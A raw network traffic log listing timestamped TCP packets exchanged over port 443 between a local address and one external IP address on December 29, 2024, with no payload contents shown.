Dec 29, 2024 17:56:14.380901098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.380940914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.383253098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.383268118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.383322954 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.383330107 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.383369923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.560981989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.561008930 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.561067104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.561079979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.561093092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.563375950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.563395977 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.563410997 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.563419104 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.563430071 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.563493013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.566591978 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.566606045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.566663027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.566673040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.566708088 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.569128990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.569143057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.569185972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.569191933 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.569227934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.586653948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.586672068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.586765051 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.586781025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.586819887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.588598967 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.588613033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.588661909 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.588670015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.588705063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.591837883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.591854095 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.591907978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.591916084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.591953039 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.594304085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.594319105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.594377995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.594388008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.594424963 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.772218943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.772234917 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.772273064 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.772280931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.772305965 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.772325993 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.775377989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.775393009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.775439978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.775445938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.775477886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.775486946 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.777822018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.777849913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.777875900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.777880907 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.777908087 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.777925968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.780375957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.780390024 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.780440092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.780447960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.780486107 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.797272921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.797291994 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.797364950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.797385931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.797425985 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.799745083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.799766064 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.799814939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.799823046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.799853086 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.799873114 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.802228928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.802243948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.802304983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.802319050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.802361012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.804779053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.804794073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.804851055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.804860115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.804896116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.983510971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.983529091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.983588934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.983597994 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.983645916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.986005068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.986017942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.986064911 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.986071110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.986104012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.988687038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.988699913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.988748074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.988754034 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.988790989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.990880966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.990916967 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.990925074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.990931988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.990978956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.993330002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.993344069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.993372917 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:14.993377924 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:14.993417978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.009764910 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.009783030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.009809017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.009823084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.009862900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.012171984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.012191057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.012219906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.012228966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.012259960 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.015407085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.015419960 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.015454054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.015460968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.015497923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.063548088 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.193876982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.193898916 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.193965912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.193985939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.194025993 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.196249008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.196263075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.196345091 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.196352005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.196403980 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.198803902 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.198817968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.198877096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.198889017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.198925972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.201931953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.201947927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.202009916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.202020884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.202061892 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.204391003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.204406023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.204462051 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.204469919 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.204500914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.220171928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.220186949 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.220227957 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.220236063 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.220259905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.220280886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.223196030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.223210096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.223262072 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.223268032 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.223304033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.225743055 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.225761890 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.225789070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.225796938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.225821972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.225835085 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.404633999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.404664993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.404725075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.404752970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.404764891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.404789925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.406972885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.406987906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.407042980 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.407047987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.407084942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.410228968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.410244942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.410270929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.410294056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.410300970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.410326004 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.410340071 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.412833929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.412847996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.412894011 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.412899971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.412928104 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.412940979 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.429630041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.429646969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.429718971 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.429728031 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.429771900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.431669950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.431684971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.431739092 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.431745052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.431782007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.434168100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.434181929 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.434225082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.434232950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.434257984 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.434281111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.434582949 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.437314987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.437330008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.437383890 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.437391043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.437424898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.540770054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.607870102 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.615869999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.615889072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.615933895 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.615942001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.615964890 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.615978003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.618309021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.618324041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.618375063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.618382931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.618417978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.620757103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.620775938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.620814085 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.620821953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.620851040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.620868921 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.623960972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.623990059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.624018908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.624023914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.624068975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.633230925 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.640279055 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.640294075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.640362978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.640367985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.640400887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.642174006 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.642187119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.642241001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.642246962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.642285109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.645308018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.645322084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.645375967 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.645381927 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.645416975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.647718906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.647732019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.647804976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.647809982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.647845030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.698616028 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.826478958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.826507092 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.826577902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.826589108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.826627970 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.828882933 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.828896999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.828950882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.828958035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.828993082 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.832118034 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.832132101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.832179070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.832186937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.832225084 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.834605932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.834619999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.834670067 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.834676027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.834711075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.839673042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.850775957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.850790977 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.850939989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.850950003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.850989103 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.853085995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.853101015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.853154898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.853162050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.853197098 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.855534077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.855547905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.855607033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.855614901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.855654001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.858747959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.858762980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.858819008 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.858824968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:15.858859062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:15.866427898 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.036953926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.036972046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.037023067 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.037034988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.037086964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.040101051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.040117025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.040152073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.040157080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.040185928 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.040210962 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.042648077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.042663097 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.042692900 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.042745113 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.042748928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.042788029 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.045171976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.045195103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.045223951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.045229912 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.045263052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.045277119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.061355114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.061368942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.061422110 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.061428070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.061466932 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:16.063664913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.063679934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:16.063716888 CET	49758	443	192.168.2.4	172.67.208.58
